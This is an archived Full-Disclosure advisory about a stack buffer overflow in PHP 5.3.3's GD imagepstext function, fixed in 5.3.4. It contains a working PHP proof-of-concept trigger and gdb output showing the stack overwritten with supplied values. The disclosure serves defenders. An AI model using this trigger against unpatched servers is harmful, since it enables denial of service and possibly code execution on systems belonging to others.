lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Fri, 10 Dec 2010 11:20:40 -0500 From: Martin Barbella <martybarbella@...il.com> To: full-disclosure@...ts.grok.org.uk Subject: PHP 5.3.3 GD extension imagepstext stack buffer overflow Description: Prior to version 5.3.4, PHP's GD extension did not properly validate the number of anti-aliasing steps passed to the function imagepstext. The value of this parameter is expected to be either 4 or 16. To accommodate this, an array of 16 integers, aa, is located on the stack. Before the number of steps is validated, it is used to populate the array. This results in a stack-based buffer overflow. Proof of concept: <?php $img = imagecreatetruecolor(1, 1); //Arbitrary $fnt = imagepsloadfont("somefont.pfb"); //Arbitrary //The final parameter is the number of anti-aliasing steps imagepstext($img, "Testing", $fnt, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA, 0xAAAAAA, 0, 0, 0.0, 99999); ?> Result in php 5.3.3 (with gdb): sh-4.1$ php -v PHP 5.3.3 (cli) (built: Jul 22 2010 15:37:02) Copyright (c) 1997-2010 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies sh-4.1$ gdb php <trimmed> (gdb) run imagepstext_poc.php Starting program: /usr/bin/php imagepstext_poc.php [Thread debugging using libthread_db enabled] Program received signal SIGSEGV, Segmentation fault. 0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa, return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810) at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257 4257 aa[i] = gdImageColorResolveAlpha(bg_img, rd, gr, bl, al); Missing separate debuginfos, use: <trimmed> (gdb) bt #0 0x004dcca7 in zif_imagepstext (ht=11184810, return_value=0xaaaaaa, return_value_ptr=0xaaaaaa, this_ptr=0xaaaaaa, return_value_used=11184810) at /usr/src/debug/php-5.3.3/ext/gd/gd.c:4257 #1 0x00aaaaaa in ?? () #2 0x00aaaaaa in ?? () #3 0x00aaaaaa in ?? () #4 0x00aaaaaa in ?? () #5 0x00aaaaaa in ?? () <etc> Result in php 5.3.4: $ ./php-5.3.4 -v PHP 5.3.4 (cli) (built: Dec 10 2010 10:26:40) Copyright (c) 1997-2010 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies $ ./php-5.3.4 imagepstext_poc.php Warning: imagepstext(): AA steps must be 4 or 16 in /home/.../imagepstext_poc.php on line 4 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists